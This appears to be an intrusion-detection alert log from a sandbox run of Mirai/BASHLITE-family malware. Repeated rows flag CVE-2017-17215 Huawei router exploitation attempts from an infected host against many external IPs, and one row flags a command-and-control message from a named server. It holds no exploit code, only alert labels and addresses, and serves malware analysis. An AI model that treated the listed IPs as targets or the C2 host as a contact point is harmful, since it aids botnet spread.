                                                        06/13/24-21:32:58.820444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456637215192.168.2.14197.121.42.160
                                                        06/13/24-21:32:03.275343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941237215192.168.2.1441.73.171.212
                                                        06/13/24-21:32:01.237950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882437215192.168.2.14197.175.146.61
                                                        06/13/24-21:32:07.403418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948637215192.168.2.14197.110.221.139
                                                        06/13/24-21:33:09.109270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397037215192.168.2.14156.194.187.209
                                                        06/13/24-21:32:38.298047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4500237215192.168.2.14197.16.94.47
                                                        06/13/24-21:32:21.805437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379837215192.168.2.1441.0.253.123
                                                        06/13/24-21:32:34.193512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917837215192.168.2.14156.29.166.186
                                                        06/13/24-21:32:09.440260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062437215192.168.2.14156.60.218.23
                                                        06/13/24-21:32:46.504046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681837215192.168.2.14197.238.181.2
                                                        06/13/24-21:32:48.549510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960237215192.168.2.14156.158.122.49
                                                        06/13/24-21:32:21.780209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643037215192.168.2.1441.15.232.209
                                                        06/13/24-21:32:36.268018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347037215192.168.2.14197.130.145.195
                                                        06/13/24-21:32:11.508020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486637215192.168.2.14197.115.239.48
                                                        06/13/24-21:32:09.439544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726437215192.168.2.14156.39.135.58
                                                        06/13/24-21:32:03.277085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4107037215192.168.2.1441.34.96.28
                                                        06/13/24-21:32:54.711900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.14197.199.193.210
                                                        06/13/24-21:33:04.991362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415637215192.168.2.14156.71.171.197
                                                        06/13/24-21:32:07.403481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.14156.161.104.61
                                                        06/13/24-21:31:59.173854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540837215192.168.2.1441.191.223.228
                                                        06/13/24-21:32:23.836844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827437215192.168.2.14156.189.115.95
                                                        06/13/24-21:32:36.246797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918437215192.168.2.14197.124.118.248
                                                        06/13/24-21:32:38.317763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259437215192.168.2.14197.220.72.141
                                                        06/13/24-21:32:46.503987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4890037215192.168.2.14156.189.34.127
                                                        06/13/24-21:32:25.996353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272437215192.168.2.14156.36.66.39
                                                        06/13/24-21:33:00.870192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544037215192.168.2.1441.162.72.167
                                                        06/13/24-21:32:56.757151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083837215192.168.2.1441.171.124.212
                                                        06/13/24-21:33:09.113754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501637215192.168.2.14197.7.31.225
                                                        06/13/24-21:31:57.090152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644437215192.168.2.14197.133.36.111
                                                        06/13/24-21:32:23.940520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925037215192.168.2.1441.72.82.1
                                                        06/13/24-21:32:30.094417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3971037215192.168.2.14156.85.228.19
                                                        06/13/24-21:33:13.227850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14197.69.101.29
                                                        06/13/24-21:32:38.304491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200437215192.168.2.14197.116.126.115
                                                        06/13/24-21:32:03.277976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215637215192.168.2.14156.107.211.96
                                                        06/13/24-21:33:11.172859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322037215192.168.2.1441.105.49.88
                                                        06/13/24-21:32:19.729634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588837215192.168.2.14156.183.184.205
                                                        06/13/24-21:32:54.708960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500637215192.168.2.1441.86.247.107
                                                        06/13/24-21:32:23.835477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431037215192.168.2.14197.207.44.145
                                                        06/13/24-21:32:13.546690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891637215192.168.2.14197.12.212.182
                                                        06/13/24-21:32:15.604740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818837215192.168.2.1441.121.151.72
                                                        06/13/24-21:33:13.231044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567237215192.168.2.1441.33.155.197
                                                        06/13/24-21:32:17.694235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875637215192.168.2.1441.208.79.15
                                                        06/13/24-21:32:54.726810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036837215192.168.2.14197.145.139.139
                                                        06/13/24-21:32:05.343541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017837215192.168.2.14197.163.203.250
                                                        06/13/24-21:32:03.294752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329637215192.168.2.14197.213.58.236
                                                        06/13/24-21:32:36.267569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.1441.85.126.126
                                                        06/13/24-21:31:57.132744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432637215192.168.2.14197.26.36.220
                                                        06/13/24-21:33:13.213421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693637215192.168.2.14156.28.0.162
                                                        06/13/24-21:33:17.310428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845637215192.168.2.1441.205.232.40
                                                        06/13/24-21:32:44.453592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.14197.60.105.73
                                                        06/13/24-21:32:32.151723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345037215192.168.2.14156.186.72.67
                                                        06/13/24-21:32:21.784599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480837215192.168.2.1441.110.30.231
                                                        06/13/24-21:32:13.545722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006437215192.168.2.1441.228.2.245
                                                        06/13/24-21:33:11.154164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332637215192.168.2.14197.169.227.97
                                                        06/13/24-21:32:44.451562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330237215192.168.2.14156.191.49.51
                                                        06/13/24-21:33:15.273221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798837215192.168.2.1441.59.34.128
                                                        06/13/24-21:32:48.550215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080237215192.168.2.14156.36.35.96
                                                        06/13/24-21:32:36.246931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701237215192.168.2.14197.40.109.95
                                                        06/13/24-21:31:57.153156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711437215192.168.2.14156.233.113.8
                                                        06/13/24-21:32:25.992916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367437215192.168.2.14197.109.5.102
                                                        06/13/24-21:32:38.297111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469837215192.168.2.14156.86.121.105
                                                        06/13/24-21:32:48.556086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265637215192.168.2.1441.179.116.135
                                                        06/13/24-21:32:44.453106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056237215192.168.2.1441.163.6.100
                                                        06/13/24-21:32:38.323857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531437215192.168.2.14197.203.220.190
                                                        06/13/24-21:32:21.785487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033837215192.168.2.14156.161.132.173
                                                        06/13/24-21:32:36.269043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729237215192.168.2.14156.84.235.245
                                                        06/13/24-21:33:09.089297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947837215192.168.2.14197.106.195.74
                                                        06/13/24-21:32:07.416554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820837215192.168.2.14197.249.128.217
                                                        06/13/24-21:33:09.109138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434637215192.168.2.14156.1.161.58
                                                        06/13/24-21:32:36.246172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569237215192.168.2.14197.250.187.74
                                                        06/13/24-21:31:57.073814TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message455439994103.82.38.94192.168.2.14
                                                        06/13/24-21:32:30.124137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433637215192.168.2.14156.94.71.67
                                                        06/13/24-21:32:30.125674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651437215192.168.2.14197.45.191.110
                                                        06/13/24-21:32:21.802528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634037215192.168.2.14197.55.11.210
                                                        06/13/24-21:32:38.300534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817237215192.168.2.14197.213.5.149
                                                        06/13/24-21:32:50.613753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821437215192.168.2.14197.205.16.157
                                                        06/13/24-21:33:07.042161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216037215192.168.2.14197.87.64.108
                                                        06/13/24-21:32:21.801205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284037215192.168.2.14156.59.221.230
                                                        06/13/24-21:32:32.153978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025037215192.168.2.14156.199.137.69
                                                        06/13/24-21:32:50.614795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008237215192.168.2.1441.75.53.131
                                                        06/13/24-21:32:17.697487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054437215192.168.2.1441.85.145.113
                                                        06/13/24-21:32:30.096958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001037215192.168.2.14197.125.194.186
                                                        06/13/24-21:33:11.157979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297037215192.168.2.1441.168.16.231
                                                        06/13/24-21:32:17.676180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.1441.20.206.152
                                                        06/13/24-21:32:34.195053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887637215192.168.2.14156.43.239.21
                                                        06/13/24-21:32:54.724425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222837215192.168.2.14197.170.0.163
                                                        06/13/24-21:32:30.125507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492437215192.168.2.14197.82.45.60
                                                        06/13/24-21:32:21.784700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292037215192.168.2.14156.223.228.72
                                                        06/13/24-21:32:01.223443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110637215192.168.2.14156.182.224.211
                                                        06/13/24-21:33:00.884550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554437215192.168.2.1441.225.27.104
                                                        06/13/24-21:32:25.970476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.14156.242.238.189
                                                        06/13/24-21:32:38.320461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048037215192.168.2.1441.4.176.241
                                                        06/13/24-21:32:58.823206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530237215192.168.2.14156.161.219.116
                                                        06/13/24-21:31:57.092534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609437215192.168.2.14156.13.57.250
                                                        06/13/24-21:32:19.731143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500437215192.168.2.1441.247.155.103
                                                        06/13/24-21:31:57.093697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505037215192.168.2.14197.175.129.195
                                                        06/13/24-21:32:21.802881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285237215192.168.2.14197.135.118.184
                                                        06/13/24-21:32:46.509937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898037215192.168.2.14156.223.121.246
                                                        06/13/24-21:33:09.089429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629437215192.168.2.14156.41.162.157
                                                        06/13/24-21:32:32.151051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756437215192.168.2.1441.151.131.239
                                                        06/13/24-21:32:28.044467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885437215192.168.2.14197.66.205.104
                                                        06/13/24-21:32:32.170676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087637215192.168.2.14197.27.171.28
                                                        06/13/24-21:32:11.507566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929037215192.168.2.14156.129.69.142
                                                        06/13/24-21:32:30.097113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523037215192.168.2.14197.53.28.115
                                                        06/13/24-21:33:15.255101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090037215192.168.2.14156.13.81.20
                                                        06/13/24-21:31:59.197820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692037215192.168.2.14156.77.39.5
                                                        06/13/24-21:32:58.842196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542037215192.168.2.14197.243.6.74
                                                        06/13/24-21:32:52.657121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932037215192.168.2.14156.26.133.45
                                                        06/13/24-21:32:32.155040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391437215192.168.2.14197.210.129.204
                                                        06/13/24-21:33:04.991992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676437215192.168.2.14197.226.103.221
                                                        06/13/24-21:33:07.041698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225437215192.168.2.14156.221.192.208
                                                        06/13/24-21:32:56.756018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724837215192.168.2.1441.28.235.188
                                                        06/13/24-21:33:09.130362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037237215192.168.2.14197.22.76.174
                                                        06/13/24-21:32:21.781041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707037215192.168.2.1441.99.111.197
                                                        06/13/24-21:32:52.679141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099237215192.168.2.14156.201.170.78
                                                        06/13/24-21:32:40.376864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625437215192.168.2.14156.119.32.254
                                                        06/13/24-21:32:52.678020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501637215192.168.2.14197.229.253.104
                                                        06/13/24-21:32:11.505564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255637215192.168.2.14197.67.45.195
                                                        06/13/24-21:32:56.754685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568837215192.168.2.14197.243.0.169
                                                        06/13/24-21:33:17.309927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587037215192.168.2.14197.105.107.170
                                                        06/13/24-21:32:54.708902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803237215192.168.2.14156.183.156.33
                                                        06/13/24-21:33:04.988940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292437215192.168.2.1441.120.4.88
                                                        06/13/24-21:33:15.256181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381437215192.168.2.1441.215.144.165
                                                        06/13/24-21:32:17.694647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919837215192.168.2.14197.128.127.65
                                                        06/13/24-21:32:54.724706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360437215192.168.2.1441.131.170.135
                                                        06/13/24-21:31:59.177850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856037215192.168.2.14156.45.190.231
                                                        06/13/24-21:32:36.244749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494037215192.168.2.14156.196.59.223
                                                        06/13/24-21:33:15.270943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637637215192.168.2.14197.41.215.12
                                                        06/13/24-21:32:52.655126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927037215192.168.2.14156.32.195.122
                                                        06/13/24-21:33:15.272847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025637215192.168.2.1441.95.237.156
                                                        06/13/24-21:32:23.942670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793237215192.168.2.1441.236.112.224
                                                        06/13/24-21:32:09.439129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621637215192.168.2.1441.67.250.248
                                                        06/13/24-21:32:07.417201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883637215192.168.2.14156.62.4.156
                                                        06/13/24-21:32:23.837133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091637215192.168.2.1441.208.73.22
                                                        06/13/24-21:32:50.610329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997837215192.168.2.14156.186.159.13
                                                        06/13/24-21:32:46.528369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903437215192.168.2.14156.190.6.5
                                                        06/13/24-21:33:05.016383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457637215192.168.2.1441.67.209.131
                                                        06/13/24-21:33:00.886379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226437215192.168.2.1441.158.8.207
                                                        06/13/24-21:31:59.199959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605837215192.168.2.14156.52.65.236
                                                        06/13/24-21:32:28.027925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084837215192.168.2.1441.105.206.132
                                                        06/13/24-21:33:09.129975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205437215192.168.2.1441.191.99.121
                                                        06/13/24-21:32:46.504108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699237215192.168.2.1441.30.95.109
                                                        06/13/24-21:32:07.417044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434437215192.168.2.14197.2.51.49
                                                        06/13/24-21:33:07.037871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131437215192.168.2.14197.55.39.184
                                                        06/13/24-21:33:17.338960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654637215192.168.2.14197.70.78.182
                                                        06/13/24-21:33:13.210302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690037215192.168.2.14197.31.104.79
                                                        06/13/24-21:33:11.181544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735837215192.168.2.14197.140.27.17
                                                        06/13/24-21:31:59.196222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092437215192.168.2.1441.167.6.76
                                                        06/13/24-21:33:00.869528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714837215192.168.2.14156.153.207.135
                                                        06/13/24-21:32:46.509596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980237215192.168.2.14197.188.104.92
                                                        06/13/24-21:32:11.488311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587637215192.168.2.1441.8.163.132
                                                        06/13/24-21:32:11.510181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358237215192.168.2.14156.2.37.195
                                                        06/13/24-21:33:15.276570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863637215192.168.2.14197.142.249.157
                                                        06/13/24-21:32:36.242877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435437215192.168.2.14197.66.16.138
                                                        06/13/24-21:32:05.369124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536037215192.168.2.14197.160.109.92
                                                        06/13/24-21:31:57.136252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317837215192.168.2.14156.195.180.29
                                                        06/13/24-21:32:19.730578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570637215192.168.2.1441.182.89.250
                                                        06/13/24-21:32:25.973790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750637215192.168.2.1441.98.98.4
                                                        06/13/24-21:32:40.359002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574237215192.168.2.1441.253.43.166
                                                        06/13/24-21:33:02.938065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605637215192.168.2.14156.31.28.227
                                                        06/13/24-21:33:13.211122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865837215192.168.2.1441.59.55.45
                                                        06/13/24-21:32:03.276292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328437215192.168.2.14197.160.148.203
                                                        06/13/24-21:32:46.508481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993037215192.168.2.14197.229.212.123
                                                        06/13/24-21:33:05.013793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947437215192.168.2.14156.112.196.140
                                                        06/13/24-21:32:03.278237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920237215192.168.2.14156.73.112.15
                                                        06/13/24-21:32:42.420462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564037215192.168.2.1441.235.143.241
                                                        06/13/24-21:32:03.307618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641237215192.168.2.14197.34.140.212
                                                        06/13/24-21:32:23.942166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334237215192.168.2.1441.51.158.38
                                                        06/13/24-21:32:15.605202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595837215192.168.2.14156.127.41.73
                                                        06/13/24-21:32:56.758696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564237215192.168.2.1441.100.210.76
                                                        06/13/24-21:32:25.977831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077237215192.168.2.14197.123.199.135
                                                        06/13/24-21:32:48.549940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190237215192.168.2.14156.117.216.134
                                                        06/13/24-21:32:01.223779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321237215192.168.2.14156.163.132.170
                                                        06/13/24-21:31:57.135658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749837215192.168.2.1441.8.155.166
                                                        06/13/24-21:32:48.570620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597437215192.168.2.1441.222.1.230
                                                        06/13/24-21:32:54.726460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725437215192.168.2.14156.250.179.43
                                                        06/13/24-21:31:59.196505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541637215192.168.2.1441.140.121.217
                                                        06/13/24-21:32:32.151667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862837215192.168.2.14197.98.32.181
                                                        06/13/24-21:32:44.454105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.14197.240.148.95
                                                        06/13/24-21:32:46.527835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351837215192.168.2.14156.104.125.170
                                                        06/13/24-21:32:32.153751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829037215192.168.2.14156.166.236.212
                                                        06/13/24-21:32:48.568652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4301637215192.168.2.14197.189.38.34
                                                        06/13/24-21:32:44.453511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620237215192.168.2.14156.8.169.219
                                                        06/13/24-21:32:09.440590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791437215192.168.2.14156.77.115.176
                                                        06/13/24-21:32:34.198861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944037215192.168.2.14156.136.100.192
                                                        06/13/24-21:33:09.101929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14156.193.87.41
